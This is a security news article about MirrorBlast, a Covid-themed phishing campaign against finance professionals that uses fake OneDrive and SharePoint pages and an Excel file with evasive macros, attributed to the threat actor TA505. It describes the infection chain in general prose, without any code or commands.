MirrorBlast Phishing Campaign Targets Finance Institutions

Security researchers uncovered an ongoing phishing campaign that has been dubbed MirrorBlast. The campaign seems to be targeting professionals working in finance.

MirrorBlast was spotted by a research team at ET Labs more than a month ago. The campaign uses malicious links inside the phishing emails that direct the victim to what researchers call a "weaponized" Excel file.

Malicious MS Office files usually contain embedded macros that bad actors use. The case with MirrorBlast is no different. While most anti-malware suites have some sort of defense against similar threats, what makes the Excel file MirrorBlast uses particularly dangerous is the nature of the embedded macros.

The macros used in the MirrorBlast file are described as "extremely lightweight". This means they are able to fool and circumvent a lot of anti-malware systems.

Researchers from Morphisec got their hands on a sample of the malware and picked it apart. The infection chain triggered by the Excel file is reminiscent of the approaches and attack vectors used by a Russian-language advanced persistent threat actor codenamed TA505, also referred to as Graceful Spider.

The link contained in the phishing emails leads to malicious, fake copies of pages that mimic OneDrive directories or malicious SharePoint pages. In the end, the victim always lands on the weaponized Excel file.

The social engineering lure used in the phishing campaign focuses, somewhat predictably, on Covid. The fake messages are tailored to look like company memos about restructuring arrangements and changes in the workplace related to the Covid situation.

Luckily for many, the malicious macros inside the file can only execute on 32-bit installs of MS Office, because of compatibility issues. The malicious macro itself runs JavaScript code that first checks for sandboxing on the host system, then uses legitimate Windows executable msiexec.exe to download and run an installer package.

TA505, the entity that is suspected to be behind the phishing MirrorBlast campaign, is described as a financially motivated threat actor that is always shifting attack vectors and approaches to stay ahead of researchers.